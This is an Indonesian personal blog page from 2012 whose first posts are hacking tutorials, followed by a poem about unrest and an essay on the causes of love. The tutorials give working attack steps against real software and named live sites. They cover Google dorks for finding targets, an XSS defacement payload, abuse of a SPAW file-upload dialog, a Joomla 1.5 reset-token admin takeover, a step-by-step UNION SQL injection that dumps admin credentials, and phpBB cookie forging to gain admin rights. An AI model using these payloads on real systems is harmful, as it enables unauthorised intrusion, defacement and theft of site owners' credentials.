Senin, 10 September 2012

CARA MEMBUAT HALAMAN DEFACE DENGAN TAG HTML BAGI PEMULA


Selamat malam. Apa kabar kalian semua? Pasti baik-baik saja ya..
Baiklah kali ini saya akan memberikan tutorial bagaimana membuat HALAMAN DEFACE DENGAN TAG HTML bagi pemula. Sebenarnya saya juga pemula ya. Hahaha. Tapi baik, mari kita share bersama.

Tahap-tahap :

1.Membuat file html
2.Mengupload hasil file html ke sebuah website.

Baiklah saya akan mulai memberikan tutorial yaitu cara membuat file html. Kalian nanti bisa menyalin semua kode html tersebut dengan file .html

1.Membuat file html :
v
Baiklah. setelah anda melihat script html diatas. Yang anda lakukan sekarang yaitu :
-Copy semua script diatas dan Paste pada Notepad lalu 
-Save as dengan Save as type : All files
-dan beri nama file dengan ekstensi .html
*Contoh : Anonymous.html
*NB : Anda juga bisa mengedit sendiri script diatas.

2.Mengupload hasil file html ke sebuah website.

Setelah anda menyimpan file tersebut, langkah selanjutnya kita akan mengupload hasil file html itu pada sebuah website. Website ini bukan yang sesungguhnya dan hanya sebagai latihan memasukkan file html atau sejenisnya.Kita akan mendeface melalui CKFinder

Baiklah, sekarang anda buka website ini
v
Sekarang di website tersebut anda akan melihat tulisan ini:

-Select the "File Uploader" to use: pilih PHP
-Upload New File sekarang browse file html anda yang telah anda simpan.
-Setelah anda upload. Disamping kanan terdapat tulisan Uploaded File URL: dan juga link baru.
-Nah, itu adalah hasil upload file anda. Lalu buka link tersebut dan hasilnya akan seperti ini
Baiklah saya kira sekian dulu ya. Saya mohon maaf jika thread ini sudah di post sebelumnya. Saya menulis ini karna saya hanya ingin berbagi ilmu. Saya sendiri juga pemula bahkan script di atas bukan pribadi yang membuat tetapi hanya mendapatkan dari seseorang yang juga mengajari saya. NEWBIE WILL NOT ALWAYS BE NEWBIE
Terimakasih sekian. 
Read More..

Cara Deface Website Menggunakan Teknik XSS Vulnerability


Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !

1). Pertama, Masukkan Dorknya :
inurl:"/showcatrows.php?CategoryID="

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html 

2). Kalo sudah, Pilih salah satu web yang akan kita deface.
Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13 

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html 

3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
Contoh : http://www.examsolutions.co.uk/...?CategoryID=13 "><marquee><h1>Hacked by Cirebon-Cyber4rt</h1></marquee>

4). Kemudian tekan Enter.
http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html 

5). Selesai, Website sudah berhasil kita deface :D

Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.
Read More..

Deface Spaw Upload Vulnerably

Banyak exploit yang dapat mengupload file secara langsung, ok kali ini kami memberi tutorial sekaligus cara menggunakan exploit itu.

dorknya :
inurl:”spaw2/dialogs/” OR  inurl:”spaw2/uploads/files/” 

Jika sudah dapat targetny, contoh targetnya :
http://climatechange.jgsee.org/Admin/spaw2/uploads/files/CC%20Book/ชุดความรู้%20CC%20Vol2.pdf

bagian : spaw2/uploads/files/CC Book/ชุดความรู้ CC Vol2.pdf

GANTI DENGAN 

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

MAKA HASILNYA SEPERTI INI

http://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
  • Akan tampil halaman untuk upload File.
  • Ganti menjadi files pada lokasi penyimpanan.
  • Browse file design Deface kamu, & upload.
  • Apabila file sukses diupload.akan terlihat file uploadtan tadi…
thx to code scurity
Read More..

HACK JOOMLA

Joomla merupakan salah satu content management system (CMS) yang cukup populer. Namun, Joomla terbaru, versi 1.5, memiliki celah keamanan yang cukup fatal. Polanya sama dengan SQL Injection yang relatif kuno. SQL Injection juga pernah dipake xnuxer untuk membobol situs Komisi Pemilihan umum (KPU) beberapa tahun lampau.

Berikut ini cara-cara membobol situs berbasis Joomla 1.5.
1. Buka alamat target yang menggunakan Joomla 1.5. Anda bisa menemukan di Google dengan mengetikkan “by Joomla 1.5? di kolom pencrian. Sebab, secara default, kalimat ini ada dalam setiap footer situs berbasis Joomla 1.5.
2. Tambahkan baris di bawah ini setelah alamat target.
index.php?option=com_user&view=reset&layout=confirm
Menjadi:
target.com/index.php?option=com_user&view=reset&layout=confirm
2. Tuliskan pada kolom “token” karakter(tanda)  ‘ dan klik OK.
3. Isi password baru untuk admin.
4. Buka halaman target.com/administrator/.
5. Login admin dengan password baru.
6. Lakukan yang Anda suka secara bertanggung jawab.
Cara ini terjadi karena kesalahan coding pada file /components/com_user/models/reset.php dan /components/com_user/models/controller.php.
NB:Posting ini hanya untuk pengetahuan. Segala bentuk penyalahgunaaan adalah tanggung jawab masing-masing .Dan bukittinggihackers tidak bertanggung jawab pada sesuatu hal yg di salah gunakan oleh orang-orang yg tidak bertanggung jawab dan kami menyarankan supaya anda meng -update Joomla anda ke versi yg terbaru

Mereset password joomla

Administrator juga manusia, kadang sang admin pun bisa lupa password untuk login sebagai Administrator websitenya. Anda pun mungkin akan mengalami sedikit masalah jika Anda web yang Anda kelola tersebut masih berada di localhost dan Anda tidak terhubung ke internet, karena fasilitas “Forgot Password” akan mengirim password baru Anda ke email Anda.
Kali ini saya akan coba kasih langkah-langkah untuk mereset password Administrator atau pun user di Joomla jika Anda tidak terhubung ke internet dan web Anda masih di localhost. Langkah-Langkah Mereset Password
1. Liat tabel users Joomla di phpMyadmin
2. Kemudian edit dan ganti password admin/user sesuai dengan yang loe mau, jangan lupa password baru yang akan loe masukin itu harus udah di MD5 dulu. Kalo ga ngerti apa itu MD5, ganti aja passwordnya dengan “226776f356d7ecf58b60bab12a05d38f” (tanpa kutip).
Kemudian coba masuk ke /administrator dan login sebagai administrator Joomla, masukkan user id yang tadi loe rubah passwordnya, kemudian di kolom password ketikkan “joomla” (tanpa kutip).Dan Selamat Mengutak atik joomla anda
SQL Injection pada Joomla (hack Joomla)
Apa jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin tidak memperhatikan security risk yang ada? Apa jadinya jika ‘the choosen one’ ternyata seorang admin yang tidak tahu sama sekali mengenai system keamanan sebuah data? Ironi memang. Bahkan terkadang ada admin yang meremehkan system keamanan. Apa jadinya jika server anda memiliki konfigurasi default? Apa jadinya, apa jadinya? Dan segudang akibat dari hasil penggabungan dua kata tersebut. Yang terjadi adalah peluang seorang attacker untuk menyusup ke dalam website anda semakin memungkinkan, mengobrak-abrik server anda, bahkan tidak jarang seorang attacker mengambil profit dari exploitasi system yang ada. Dalam berbagai hal, termasuk mendulang dollar dengan cara tidak halal. Seperti yang dilakukan oleh para carder.
Penulis akan menjelaskan betapa mudahnya sebuah web dieksploitasi hanya dengan bermodalkan internet dan browser internet tentunya, dan sedikit pengetahuan sql query. Perlu penulis jelaskan, penulis hanyalah seorang manusia biasa yang memiliki pengetahuan minimal dari sistem keamanan data.
Ya, belum lama ini, salah satu component joomla terbukti mengidap penyakit berbahaya, tumor ganas yang akan menjalar keseluruh tubuh, dan berakibat kematian pada akhirnya. :D ~~
Telah ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah satu contoh dari sekian banyak bug fatal yang terdapat dalam joomla. Waspadalah! Kesalahan terjadi karena komponen ini tidak menyediakan filtering sql yang ketat dalam variable feed_id. Penyusupan dapat dilakukan, sederhananya ini terjadi karena kesalahan dari variable feed_id. Dan saat menulis artikel ini ada beberapa site masih memiliki kecacatan seperti ini.
Ya, Langsung aja …
http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1
Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes kelemahannya, dengan penambahan tanda kutip ( ‘ ) di belakangnya.
http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1′
Apa yang terjadi ? … error…
Langkah selanjutnya adalah cari urutan si table ‘dssyndicate_feeds’ dengan mendapatkan bentuk error yang sama, dan berhenti ketika mendapatkan error yang berbeda :
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+20/* –> errornya sama

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+21/* –> errornya berbeda
perhatikan bentuk error-nya berbeda ketika feed_id yang diisi dengan 1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql yang selanjutnya.
Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan baca di sini.
Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban.
index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19,20+from+wc_users
lihat paling akhir dari baris tersebut,
from+wc_users
wc_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai informasi login user.
Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini diperoleh berdasarkan yang telah penulis jelaskan sebelumnya.
Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut,
Setelah itu buka file yang baru didownload tersebut dengan editor seperti notepad, walaupun filenya xml, tapi penulis tetap menyarankan untuk membukanya dengan notepad, tidak dengan browser internet, karena memudahkan untuk pembacaan hasil dari sql injection yang telah dilakukan.
Lihat angka 2 di dalam tag
Jangan pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah angka 2-nya. Ini berarti berdasarkan hasil query union menggunakan browser tadi, anda dapat menggunakan angka 2 tersebut untuk keperluan selanjutnya. Seperti mengganti angka 2 dengan kumpulan karakter lain untuk menggunakannya seperti melihat versi mysql yang digunakan, ya langsung saja, kita akan mencobanya untuk melihat versi mysql yang digunakan oleh si korban. Gunakan url ini …
http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from
+wc_users
perhatikan angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali file telah di download dengan notepad, apa yang terjadi ? title berubah menjadi versi si mysql, yang penulis dapatkan :
Mysql versi 5.0.33 :D , sampai sini anda telah dapat eksplorasi database user dengan leluasa. Apa yang dilakukan seorang attacker selanjutnya ? ya, mendapatkan username dan password si admin. :D .
Pengambilan username dan password secara paksa menggunakan sql injection ini dapat dilakukan secara satu persatu, ataupun sekaligus. Query untuk menampilkan username menggunakan bug sql injection yang satu ini, anda cukup mengganti @@version yang tadi dengan field yang menyimpan informasi username tentunya, gunakan url ini :
http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users
jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah username dari database tersebut …
Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus, gunakan url seperti ini :
http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users
perhatikan, string username, diganti dengan concat(username,0x3a,password,0x3a,email,0x3a,usertype), penggunaan concat disini adalah mengconvert suatu hexa, ataupun spesial karakter kedalam bentuk ascii, sehingga, yang terjadi nantinya adalah :
0x3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di atas. Yang penulis dapatkan adalah informasi seperti ini :
admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK: alkemail@gmail.comThis e-mail address is being protected from spambots, you need JavaScript enabled to view it :Super Administrator
Jika di urutkan :
Username : admin
Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK
Email : alkemail@gmail.comThis e-mail address is being protected from spambots, you need JavaScript enabled to view it
User type : Super Administrator
Yang di lakukan selanjutnya adalah mencoba crack password, karena itu masih dalam bentuk hash, dengan kata lain password yang masih terenkripsi. :D . Yups, pengambilan username dan password secara paksa telah terjadi, si attacker kembali mencari cara bagaimana mendapatkan password yang asli, dengan cara mengcrack password hash tersebut.
Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari seorang admin yang malas melakukan patch pada systemnya.
Di artikel selanjutnya penulis akan menjalankan konsep sederhana password crack untuk joomla menggunakan php. Tunggu kelanjutannya … :D .
Untuk keperluan experiment, silahkan download filenya di sini.
http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-Full_Package.zip
Read More..

Diface PHPBB

Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20
1. Download browser Mozilla FireFox

2. Download pluginnya yg bernama LiveHTTPHeader
download di bawah
cari yg paling baru

3. selanjutnya cari target dengan Uncle Google dgn syntax :
phpBB site:[terserah apa aja]

4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader

5. Ingat, isi LiveHTTPHeader harus kosong

6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target


7. setelah halaman sukses terbuka ditandai dengan tanda "done" di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..

8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay...

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

9. Hapus bagian yg belakang setelah tanda semi colon (

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

\_______________hapus bagian ini_________________/

jadinya akan seperti ini :

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D

10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi

11. selanjutnya perhatikan langkah di bawah ini:

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
\________hapus bagian ini dan di ganti dengan:

Cookie: phpbb2mysql_data=a:2{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}

12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

13. perhatikan lagi langkah ini:

Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}
\___________________________bagian ini jg digantilagi_______________________________/

menjadi seperti ini:

Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.
Silakan pergi ke bawah halaman dan lihat opsi "Go To Administration Panel" telah muncul.


Read More..

Senin, 12 Maret 2012

GELISAH

Gelap malam penuh kesunyian
Lamunan jauh menerawang angkasa
Membukakan pintu-pintu mimpi
Menyibakan tirai-tirai kegalauan jiwa


Bias keremangan memudarkan kasih
Memutar hati menguak arti ilusi
Memudarkan beribu warna cahaya
Membayang menjauh dari arah cita


Katak merengek ikut meresah
Menggugah hati kala gelisah
Air hujan menetes berduka
Membasah bumi ikut bersedih


Gema kegundahan kian bertalu
Gemercik air melantun irama nan merdu
Berhembus angin membelai lembut
Gemerisik suara daun menghibur
Membangkit menggugah kalbu


Meliuk menari rumput nan ayu
Melambai perlahan seolah mengajak
Melepas duka menjemput cinta
Merayu bernyanyi kerinduan
Menyongsong esok akan kebahagiaan
Read More..

Jumat, 17 Februari 2012

CINTA DAN SEBAB-SEBABNYA

Cinta adalah suatu sifat khas bagi yang hidup dan berperasaan.
        Cinta tak akan ada pada kayu,batu dan sebagainya.
        Manusia menikmati segala sesuatu yang sesuai dengan tabi`atnya,
        lalu cenderung kepadanya,dan mencintainya.Tak mungkin ada cinta sebelum
        Sesuatu itu dikenal atau dilihat.Panca indera dari hati,masing-masing
        mempunyai kenikmatanya sendiri.
        Untuk mata;tamasya yang indah,rupa yang cantik
        Untuk telinga;suara yang merdu.
        Demikianlah seterusnya

                                           SEBAB-SEBAB CINTA 


          Bahwa manusia cinta atau suka akan dirinya sendiri
Bahwa ia tempo-tempo cinta atau suka kepada orang lain
Untuk kepentingan dirinya sendiri,itu sudah nyata.
Akan tetapi,bahwa ia cinta kepada yang lain hanya semata-mata
Karena dzatnya yang lain itu,bukan karena kepentingan dirinya sendiri
Adalah satu hal yang sukar dipahami oleh kebanyakan orang.
Sebetulnya yang demikian itu tidak mustahil,bahkan sudah terjadi.


1.Dicinta si-hidup itu ialah dirinya sendiri.cinta diri berarti ingin terus hidup,
   tidak mau binasa.ia suka keabadian dan kesempurnaan wujud dirinya.
  
2.Manusia gampang tertarik hatinya oleh perbuatan baik dari orang lain.


3.Ia cinta atau suka sesuatu,tidak lain hanya karena dzar si-tercinta itu saja.
   Inilah cinta sejati yang boleh dipercaya ketetapanya.
  Cinta atau suka akan keindahan,kebagusan,kemolekan itu,
  adalah hanya karena dzat keindahan itu sendiri.  
  Nikmat cinta itu disukai,dicari,tidak lain hanya karena dzatnya.   
 
4.Orang mengira keelokan itu hanya ada  pada(umpamanya),
   muka yang manis,kulit putih,badan langsing dan sebagainya.
  Yang lainnya,yang tidak dapat tercapai oleh penglihatan mata,
   Itu tidak mengandung arti indah.

5.Tali cinta kerap kali menjadi erat bukan karena keelokan,
    Tetapi hanya karena tannasub(kesesuain/kecocokan)hati dan jiwa.     


   Tiap sesuatu akan menjadi indah,jika padanya kesempurnaan yang,
yang layak dan mungkin baginya.Dan jika syarat-syarat kesempurnaannya lengkap,
sampailah ia pada puncak keindahannya.
   Keindahan itu ada pula yang tidak dapat tercapai oleh panca-indera sekali pun,
keindahan akhlak,ilmu,dan sebagainya.

   Kebijakan,kecerdasan,keberanian,kemurahan hati,ketaqwaan,ini semua cinta


Lima inti dari sebab-sebab cinta sebagai berikut:

1.Cinta kepada wujud,kesempurnaan dan hidup diri sendiri.
2.Cinta seorang kepada seorang yang berbuat baik kepadanya.
3.Cintanya kepada yang berbuat baik karena dzatnya,
   Meskipun kebaikannya itu ditujukan kepada orang lain dan bukan kepadanya
4.Cintanya kepada yang bagus,indah,elok,baik lahir maupun batin
5.Cinta karena ada tannasub(kesesuaian/kecocolan)hati dan jiwa
Read More..
RIZKI © 2008 Template by:
SkinCorner